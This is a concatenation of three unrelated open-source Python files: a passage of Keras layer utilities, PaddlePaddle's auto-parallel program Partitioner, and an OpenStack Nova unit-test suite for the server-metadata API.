the underlying tensor gets created in a FuncGraph managed by control_flow_v2.
We need to raise clear error messages in such cases.
Arguments:
tensor: Tensor to check, or `False` if it is known that an error
should be raised.
method: Caller method, one of {'add_metric', 'add_loss', 'add_update'}.
force_raise: If an error should be raised regardless of `tensor`.
Raises:
RuntimeError: In case of an out-of-graph tensor.
"""
if (force_raise or
(ops.executing_eagerly_outside_functions() and
hasattr(tensor, 'graph') and
isinstance(tensor.graph,
(control_flow_v2_func_graphs.CondBranchFuncGraph,
control_flow_v2_func_graphs.WhileCondFuncGraph,
control_flow_v2_func_graphs.WhileBodyFuncGraph)))):
if method == 'activity_regularizer':
bad_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
if training:
return self.dense(x)
else:
return self.dense(x)
"""
correct_example = """
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(name='test_model')
self.dense = tf.keras.layers.Dense(2, activity_regularizer='l2')
def call(self, x, training=None):
return self.dense(x)
"""
raise RuntimeError(
'You are using a layer with `activity_regularizer` in a control flow '
'branch, e.g.:\n{bad_example}\nThis is currently not supported. '
'Please move your call to the layer with `activity_regularizer` out '
'of the control flow branch, e.g.:\n{correct_example}\n'
'You can also resolve this by marking your outer model/layer dynamic'
' (eager-only) by passing `dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you to implement static '
'shape inference in the `compute_output_shape(input_shape)` '
'method.'.format(
bad_example=bad_example, correct_example=correct_example))
if method == 'add_metric':
bad_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
metric = compute_metric(inputs)
else:
metric = 0.
self.add_metric(metric, name='my_metric', aggregation='mean')
return inputs
"""
elif method == 'add_loss':
bad_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
self.add_loss(loss)
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
loss = compute_loss(inputs)
else:
loss = 0.
self.add_loss(loss)
return inputs
"""
else:
bad_example = """
def call(self, inputs, training=None):
if training:
self.add_update(self.w.assign_add(1))
return inputs
"""
correct_example = """
def call(self, inputs, training=None):
if training:
increment = 1
else:
increment = 0
self.add_update(self.w.assign_add(increment))
return inputs
"""
raise RuntimeError(
'You are using the method `{method}` in a control flow branch '
'in your layer, e.g.:\n{bad_example}\n'
'This is not currently supported. '
'Please move your call to {method} out of the control flow branch, '
'e.g.:\n{correct_example}\n'
'You can also resolve this by marking your layer '
'as dynamic (eager-only) by passing '
'`dynamic=True` to the layer constructor. '
'Any kind of control flow is supported with dynamic layers. '
'Note that using `dynamic=True` requires you '
'to implement static shape inference '
'in the `compute_output_shape(input_shape)` method.'.format(
method=method,
bad_example=bad_example,
correct_example=correct_example))
def mark_as_return(outputs, acd):
"""Marks `outputs` as the return values for automatic control deps."""
def _mark_as_return(tensor):
"""Marks `tensor` as the return value for automatic control deps."""
if not tensor_util.is_tensor(tensor):
return tensor
# pylint: disable=protected-access
return_tensor = acd.mark_as_return(tensor)
if getattr(tensor, '_keras_mask', None) is not None:
return_tensor._keras_mask = acd.mark_as_return(tensor._keras_mask)
else:
return_tensor._keras_mask = None
# Handle TensorFlow Probability attached metadata.
# TODO(b/132076537): Remove this once TFP uses `CompositeTensor`.
if getattr(tensor, '_tfp_distribution', None) is not None:
return_tensor._tfp_distribution = tensor._tfp_distribution
return return_tensor
# pylint: enable=protected-access
return nest.map_structure(_mark_as_return, outputs)
V2_DTYPE_BEHAVIOR = None
def enable_v2_dtype_behavior():
"""Enable the V2 dtype behavior for Keras layers.
By default, the V2 dtype behavior is enabled in TensorFlow 2.
When enabled, the dtype of Keras layers defaults to floatx (which is typically
float32) instead of None. In addition, layers will automatically cast
floating-point inputs to the layer's dtype.
For example, once enabled, the following block will run a Conv2D layer
in float32:
```python
x = tf.ones((4, 4, 4, 4), dtype='float64')
layer = tf.keras.layers.Conv2D(filters=4, kernel_size=2)
print(layer.dtype) # Float32 when enabled. None when disabled.
# When enabled, will cast inputs to the layer's dtype, which is float32. When
# disabled, will do no casting, so the layer is done in float64.
y = layer(x)
```
A layer author can opt-out their layer from the automatic input casting by
passing `autocast=False` to the base Layer's constructor. This disables the
autocasting part of the V2 behavior for that layer, but not the defaulting to
floatx part of the V2 behavior.
When a global `tf.keras.mixed_precision.experimental.Policy` is set, the
layer's dtype will default to the global policy instead of floatx. Layers
will automatically cast inputs to the policy's compute_dtype.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = True
def disable_v2_dtype_behavior():
"""Disables the V2 dtype behavior for Keras layers.
See `enable_v2_dtype_behavior`.
This function will be removed in the future.
"""
global V2_DTYPE_BEHAVIOR
V2_DTYPE_BEHAVIOR = False
def v2_dtype_behavior_enabled():
"""Returns True if the V2 dtype behavior is enabled."""
if V2_DTYPE_BEHAVIOR is None:
return tf2.enabled()
return V2_DTYPE_BEHAVIOR
class TrackableWeightHandler(object):
"""Keras wrapper for handling tracking.Trackable object saving and restoring.
This class handles Trackables in both V1 and V2 modes, ensuring that they can
be saved and restored with the correct data and without adding additional ops
on every save.
Attributes:
trackable: The trackable to wrap.
num_tensors: The number of tensors that this trackable requires for saving.
"""
def __init__(self, trackable):
if not isinstance(trackable, tracking.Trackable):
raise ValueError('%s is not a Trackable object.' % (trackable,))
self._trackable = trackable
# TODO(b/141682913): Figure out why this is private and fix it.
saveables = trackable._gather_saveables_for_checkpoint().values() # pylint: disable=protected-access
if len(saveables) != 1:
raise ValueError('Only Trackables with one Saveable are supported.')
saveable = list(saveables)[0]
if ops.executing_eagerly_outside_functions():
# If we're in eager mode, we need to defer calling the Trackable's
# saveable() callable until data export time.
# However, it is safe to call the saveable as many times as we want, so
# we will call it now to figure out how many tensors this Trackable will
# produce.
self._saveable = saveable
self._num_tensors = len(self._saveable().specs)
self._setter = lambda weights: self._saveable().restore(weights, None)
self._getter = lambda: [spec.tensor for spec in self._saveable().specs]
else:
# If we're in Graph mode, we need to evaluate the Saveable only once and
# cache the resulting restore graph. Failing to do this will result in
# new assignment ops being added to the graph each time set_weights() is
# called.
self._placeholder_tensors = []
self._saveable = saveable()
self._num_tensors = len(self._saveable.specs)
for spec in self._saveable.specs:
tensor = spec.tensor
self._placeholder_tensors.append(
array_ops.placeholder(tensor.dtype, tensor.shape))
self._assign_op = self._saveable.restore(self._placeholder_tensors, None)
self._setter = self._set_weights_v1
self._getter = lambda: [spec.tensor for spec in self._saveable.specs]
@property
def num_tensors(self):
return self._num_tensors
def set_weights(self, weights):
if len(weights) != self._num_tensors:
raise ValueError(
('Weight handler for trackable %s received the wrong number of ' +
'weights: expected %s, got %s.') %
(self._trackable, self._num_tensors, len(weights)))
self._setter(weights)
def get_tensors(self):
return self._getter()
def _set_weights_v1(self, weights):
feed_dict = {}
for idx, tensor in enumerate(weights):
feed_dict[self._placeholder_tensors[idx]] = tensor
backend.get_session().run(self._assign_op, feed_dict)
# TODO(kathywu): This is a temporary hack. When a network of layers is revived
# from SavedModel, only the top-level layer will have losses. This causes issues
# in eager mode because the child layers may have graph losses
# (thus model.losses returns a mix of Eager and graph tensors). To fix this,
# whenever eager losses are added to one layer, add eager losses to all
# child layers. This causes `.losses` to only return eager losses.
REVIVED_LOSS_PLACEHOLDER = (
'This layer\'s losses have been added to the parent layer.')
|
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import copy
import numpy as np
import paddle
import paddle.fluid as fluid
from paddle.fluid import core
from paddle.fluid import framework as framework
from paddle.fluid import core, unique_name
from paddle.fluid.framework import Program, Parameter, Variable, program_guard
from paddle.distributed.auto_parallel.operators.common import get_distributed_operator_impl_container
from paddle.distributed.auto_parallel.dist_context import DistributedContext, DistributedOperatorContext
from .dist_attribute import OperatorDistributedAttribute
from .process_group import new_process_group
from .utils import set_dist_op_desc_original_id
from .utils import print_program_with_dist_attr, is_forward_op, is_backward_op
from .operators.common import BACKWARD_ONLY_DIST_OPS
__varname_not_in_block__ = ["lod_tensor_blocking_queue_0"]
__not_shape_var_type__ = [
core.VarDesc.VarType.READER, core.VarDesc.VarType.STEP_SCOPES
]
class Partitioner(object):
"""
warning:: Partitioner is experimental and subject to change.
Partitioner convert a program into another program.
Given a serial program which has been auto completed with shard annotation, the Partitioner
convert the serial program into a "distributed" program. The Partitioner will modify the serial
program in following two ways, which is also the major difference between serial and distributed program:
1. partition op: replace a serial op into its corresponding dist op infered from the shard annotation
2. partition var: if a var is sharded, modify the shape of var according to its shard annotation
Partitioner is supposed to be call by the auto parallel framework, and not supposed to be directly called by user.
"""
def __init__(self, dist_context, rank_id=0):
"""
Args:
dist_context (paddle.fluid.DistributedContext): used to access the distributed_attr of var & op, every Partitioner object could maintain its own DistributedContext member, and partition program base on that shard scenario.
rank_id (int): global rank id to which the partitioned distributed program belong.
"""
if not isinstance(dist_context, DistributedContext):
raise TypeError(
"dist_context be paddle.fluid.DistributedContext, got %s here" %
type(dist_context))
self._dist_context = dist_context
self._rank_id = rank_id
self._serial2dist_varname_mapping = {}
self._dist_varname_suffix = ""
def partition(self, serial_main_program, serial_startup_program,
params_grads):
if not isinstance(serial_main_program, (Program)):
raise TypeError(
"main_program be paddle.fluid.framework.program, got %s here" %
type(serial_main_program))
# check if shard annotated serial program valid
if not self._is_valid_annotated_program(serial_main_program):
raise RuntimeError(
"Not all vars or ops are annotated in main program !")
# init distop helper
dist_op_context = self._dist_context.dist_op_context
dist_op_context.varname_mapping = self._serial2dist_varname_mapping
dist_op_context.rank_id = self._rank_id
# partition startup program
if serial_startup_program == None:
partitioned_startup_prog = None
else:
partitioned_startup_prog = self.partition_startup_program(
serial_main_program, serial_startup_program)
dist_op_context.dst_startup_program = partitioned_startup_prog
# partition main program
partitioned_main_prog, partitioned_params_grads = self.partition_main_program(
serial_main_program, params_grads)
return partitioned_main_prog, partitioned_startup_prog, partitioned_params_grads
def partition_startup_program(self, serial_main_program,
serial_startup_program):
if not isinstance(serial_startup_program, (Program)):
raise TypeError(
"dist_context be paddle.fluid.framework.program, got %s here" %
type(serial_startup_program))
partitioned_startup_prog = fluid.Program()
ref_block = serial_main_program.global_block()
target_block = partitioned_startup_prog.global_block()
var2shape = {}
temp_varname_map = {}
# tensors
for var in serial_startup_program.list_vars():
assert var.persistable
new_name = var.name + self._dist_varname_suffix
temp_varname_map[var.name] = new_name
target_shape = _partition_var(self._dist_context, ref_block,
target_block, var.name, new_name)
var2shape[new_name] = target_shape
# ops
for op in serial_startup_program.global_block().ops:
# TODO if var not belong to this rank, should be filtered
output_vars = op.desc.output_arg_names()
assert len(
output_vars
) == 1, "initializer should output only ONE variable, but got [{}]".format(
str(op.desc))
assert temp_varname_map[output_vars[
0]] in var2shape, "try to initialize [{}] which is not a persistable var".format(
output_vars[0])
new_op_desc = target_block.desc.append_op()
new_op_desc.copy_from(op.desc)
new_op_desc._rename_output(output_vars[0],
temp_varname_map[output_vars[0]])
new_op_desc._set_attr("shape",
var2shape[temp_varname_map[output_vars[0]]])
target_block._sync_with_cpp()
# set distribute atrribute
new_op = target_block.ops[-1]
assert new_op.type == new_op_desc.type()
assert new_op.desc == new_op_desc
output_var = target_block.var(output_vars[0])
output_var_attr = self._dist_context.get_tensor_dist_attr_for_program(
output_var)
op_attr = OperatorDistributedAttribute()
op_attr.process_mesh = output_var_attr.process_mesh
op_attr.set_output_dims_mapping(output_var.name,
output_var_attr.dims_mapping)
op_attr.set_input_dims_mapping(output_var.name,
output_var_attr.dims_mapping)
self._dist_context.set_op_dist_attr_for_program(new_op, op_attr)
return partitioned_startup_prog
def partition_main_program(self, serial_main_program, params_and_grads):
"""
1. partition variables
2. replace local op with corresponding dist op
"""
partitioned_main_prog = fluid.Program()
dist_op_context = self._dist_context.dist_op_context
dist_op_context.dst_main_program = partitioned_main_prog
for idx in range(self._dist_context.block_state.nblock):
ref_block = serial_main_program.blocks[idx]
if idx == 0:
target_block = partitioned_main_prog.blocks[0]
else:
target_block = partitioned_main_prog._create_block(
parent_idx=ref_block.parent_idx)
assert ref_block.idx == target_block.idx
target_block._set_forward_block_idx(ref_block.forward_block_idx)
dist_op_context.work_block = target_block
self.partition_block(ref_block, target_block)
partitioned_main_prog.current_block_idx = 0
partitioned_params_and_grads = []
for p, g in params_and_grads:
assert p.name in self._serial2dist_varname_mapping
dist_p = self._get_dist_var_by_serial_var(p, partitioned_main_prog)
if g is None:
dist_g = None
else:
assert g.name in self._serial2dist_varname_mapping
dist_g = self._get_dist_var_by_serial_var(g,
partitioned_main_prog)
partitioned_params_and_grads.append((dist_p, dist_g))
return partitioned_main_prog, partitioned_params_and_grads
def partition_block(self, ref_block, target_block):
dist_op_context = self._dist_context.dist_op_context
serial_ops = ref_block.ops
# init mapping
forward_op_id2forward_op = {}
for idx in range(len(serial_ops)):
if is_forward_op(serial_ops[idx]):
forward_op_id2forward_op[serial_ops[idx].desc.id(
)] = serial_ops[idx]
# partiiton
for op in serial_ops:
# partititon input variables
for serial_input_varname in op.desc.input_arg_names():
if serial_input_varname not in self._serial2dist_varname_mapping:
new_varname = serial_input_varname + self._dist_varname_suffix
if ref_block.has_var(serial_input_varname):
_partition_var(self._dist_context, ref_block,
target_block, serial_input_varname,
new_varname)
else:
assert serial_input_varname in __varname_not_in_block__
self._serial2dist_varname_mapping[
serial_input_varname] = new_varname
# partition output vars
for serial_output_varname in op.desc.output_arg_names():
if serial_output_varname not in self._serial2dist_varname_mapping:
new_varname = serial_output_varname + self._dist_varname_suffix
_partition_var(self._dist_context, ref_block, target_block,
serial_output_varname, new_varname)
self._serial2dist_varname_mapping[
serial_output_varname] = new_varname
# partition op
op_dist_attr = self._dist_context.get_op_dist_attr_for_program(op)
if is_forward_op(op) or op_dist_attr.is_recompute:
kinputs, koutputs = dist_op_context.prepare_context(op)
dist_op_forward_impl = _get_dist_op_forward_implement(
op, self._dist_context)
dist_op_forward_impl.forward(self._dist_context, **kinputs,
**koutputs)
elif is_backward_op(op):
kinputs, koutputs = dist_op_context.prepare_context(op)
dist_op_backward_impl = _get_dist_op_backward_implement(
op, self._dist_context, forward_op_id2forward_op)
dist_op_backward_impl.backward(self._dist_context, **kinputs,
**koutputs)
else:
raise NotImplementedError(
"partitioner only support forward op and backward op, but got {}".
format(str(op)))
def _is_valid_annotated_program(self, program):
# TODO (ZJ-LIANG) should check all block
ops = program.global_block().ops
vars_ = program.list_vars()
op_dist_attrs = [
self._dist_context.get_op_dist_attr_for_program(op) for op in ops
]
var_dist_attrs = [
self._dist_context.get_tensor_dist_attr_for_program(var)
for var in vars_ if (var.type not in __not_shape_var_type__)
]
all_ops_annotated = all(dist_attr is not None
for dist_attr in op_dist_attrs)
all_vars_annotated = all(dist_attr is not None
for dist_attr in var_dist_attrs)
return all_ops_annotated and all_vars_annotated
def _get_dist_var_by_serial_var(self, serial_var, partitioned_main_prog):
block_idx = serial_var.block.idx
target_block = partitioned_main_prog.blocks[block_idx]
dist_var_name = self._serial2dist_varname_mapping[serial_var.name]
assert target_block.has_var(dist_var_name)
return target_block.var(dist_var_name)
def _get_dist_shape(var, dist_attr):
var_shape = var.shape
mapping = dist_attr.dims_mapping
mesh = dist_attr.process_mesh.topology
if mapping == []:
return var_shape
assert len(var_shape) == len(
mapping
), "variable shape [{}] and dim_mapping [{}] is NOT match !".format(
var_shape, mapping)
new_shape = []
for idx in range(len(var_shape)):
if var_shape[idx] == -1 or mapping[idx] == -1:
new_shape.append(var_shape[idx])
else:
assert var_shape[idx] % mesh[mapping[
idx]] == 0, "un-event partition: var_shape[idx]=[{}], mesh[{}]".format(
var_shape[idx], mesh[mapping[idx]])
new_shape.append(var_shape[idx] // mesh[mapping[idx]])
return new_shape
def _partition_parameter(dist_context, src_var, dst_block, dst_varname,
dst_shape):
# NOTE hack to copied Parameter
# not initialized parameter, need to initialize it
copied_kwargs = {}
copied_kwargs['trainable'] = src_var.trainable
copied_kwargs['optimize_attr'] = src_var.optimize_attr
copied_kwargs['regularizer'] = src_var.regularizer
copied_kwargs['do_model_average'] = src_var.do_model_average
copied_kwargs['need_clip'] = src_var.need_clip
param = Parameter(
block=dst_block,
type=src_var.type,
name=dst_varname,
shape=dst_shape,
dtype=src_var.dtype,
lod_level=src_var.lod_level,
error_clip=src_var.error_clip,
stop_gradient=src_var.stop_gradient,
is_data=src_var.is_data,
belong_to_optimizer=src_var.belong_to_optimizer,
**copied_kwargs)
# set dist attr uid
# distributed_attr_uid = src_var.desc.get_distributed_attr_uid()
# param.desc.set_distributed_attr_uid(distributed_attr_uid)
dist_attr = copy.deepcopy(
dist_context.get_tensor_dist_attr_for_program(src_var))
assert dist_attr is not None
dist_context.set_tensor_dist_attr_for_program(param, dist_attr)
def _partition_intermediate_var(dist_context, src_var, dst_block, dst_varname,
dst_shape):
var = dst_block.create_var(
type=src_var.type,
name=dst_varname,
shape=dst_shape,
dtype=src_var.dtype,
lod_level=src_var.lod_level,
persistable=src_var.persistable,
error_clip=src_var.error_clip,
stop_gradient=src_var.stop_gradient,
is_data=src_var.is_data,
belong_to_optimizer=src_var.belong_to_optimizer)
# set dist attr uid
# distributed_attr_uid = src_var.desc.get_distributed_attr_uid()
# var.desc.set_distributed_attr_uid(distributed_attr_uid)
dist_attr = copy.deepcopy(
dist_context.get_tensor_dist_attr_for_program(src_var))
assert dist_attr is not None
dist_context.set_tensor_dist_attr_for_program(var, dist_attr)
def _partition_var(dist_context, src_block, dst_block, src_varname,
dst_varname):
"""
partition include: split + replicate
"""
src_var = src_block.var(src_varname)
if src_var.type in __not_shape_var_type__:
dst_block.create_var(
type=src_var.type,
name=dst_varname,
persistable=True,
stop_gradient=True)
target_shape = None
else:
dist_attr = dist_context.get_tensor_dist_attr_for_program(src_var)
target_shape = _get_dist_shape(src_var, dist_attr)
if isinstance(src_var, Parameter):
_partition_parameter(dist_context, src_var, dst_block, dst_varname,
target_shape)
else:
_partition_intermediate_var(dist_context, src_var, dst_block,
dst_varname, target_shape)
return target_shape
def _get_dist_op_backward_implement(backward_op, dist_context,
forward_op_id2forward_op):
dist_op_context = dist_context.dist_op_context
if backward_op.desc.id() in dist_op_context.grad_op_id_to_op_id:
forward_op_id = dist_op_context.grad_op_id_to_op_id[backward_op.desc.id(
)]
forward_op = forward_op_id2forward_op[forward_op_id]
forward_op_dist_attr = dist_context.get_op_dist_attr_for_program(
forward_op)
dist_op_impl_container = get_distributed_operator_impl_container(
forward_op_dist_attr.impl_type)
dist_op_impl = dist_op_impl_container.get_impl(
forward_op_dist_attr.impl_idx)
return dist_op_impl
# # NOTE trick for dist ops that only have backward implement
if backward_op.type in BACKWARD_ONLY_DIST_OPS:
op_dist_attr = dist_context.get_op_dist_attr_for_program(backward_op)
assert op_dist_attr.impl_idx >= 0
dist_op_impl = get_distributed_operator_impl_container(
op_dist_attr.impl_type).get_impl(op_dist_attr.impl_idx)
return dist_op_impl
dist_op = get_distributed_operator_impl_container("default")
return dist_op.get_impl(0)
def _get_dist_op_forward_implement(forward_op, dist_context):
dist_attr = dist_context.get_op_dist_attr_for_program(forward_op)
dist_op_impl_container = get_distributed_operator_impl_container(
dist_attr.impl_type)
dist_op_impl = dist_op_impl_container.get_impl(dist_attr.impl_idx)
return dist_op_impl
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from oslo.config import cfg
import six
import webob
from nova.api.openstack.compute import server_metadata
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import vm_states
import nova.db
from nova import exception
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
CONF = cfg.CONF
def return_create_instance_metadata_max(context, server_id, metadata, delete):
return stub_max_server_metadata()
def return_create_instance_metadata(context, server_id, metadata, delete):
return stub_server_metadata()
def fake_instance_save(inst, **kwargs):
inst.metadata = stub_server_metadata()
inst.obj_reset_changes()
def return_server_metadata(context, server_id):
if not isinstance(server_id, six.string_types) or not len(server_id) == 36:
msg = 'id %s must be a uuid in return server metadata' % server_id
raise Exception(msg)
return stub_server_metadata()
def return_empty_server_metadata(context, server_id):
return {}
def delete_server_metadata(context, server_id, key):
pass
def stub_server_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_max_server_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_server(context, server_id, columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE})
def return_server_by_uuid(context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'metadata': stub_server_metadata(),
'vm_state': vm_states.ACTIVE})
def return_server_nonexistent(context, server_id,
columns_to_join=None, use_slave=False):
raise exception.InstanceNotFound(instance_id=server_id)
def fake_change_instance_metadata(self, context, instance, diff):
pass
class BaseTest(test.TestCase):
def setUp(self):
super(BaseTest, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self.controller = server_metadata.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
class ServerMetaDataTest(BaseTest):
def test_index(self):
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.uuid)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.uuid)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
res_dict = self.controller.show(req, self.uuid, 'key2')
expected = {'meta': {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key6')
def test_delete(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.uuid, 'key2')
self.assertIsNone(res)
def test_delete_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key6')
def test_create(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.uuid, body)
body['metadata'].update({
"key1": "value1",
"key2": "value2",
"key3": "value3",
})
self.assertEqual(body, res_dict)
def test_create_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, None)
def test_create_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, body)
def test_create_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
req, self.uuid, body)
def test_create_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.uuid, body)
def test_update_metadata(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
response = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, response)
def test_update_all(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, res_dict)
def test_update_all_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, expected)
def test_update_all_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, expected)
def test_update_all_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body)
def test_update_item(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.uuid, 'key1', body)
expected = {'meta': {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank('/v1.1/fake/servers/asdf/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.uuid, 'key1', body)
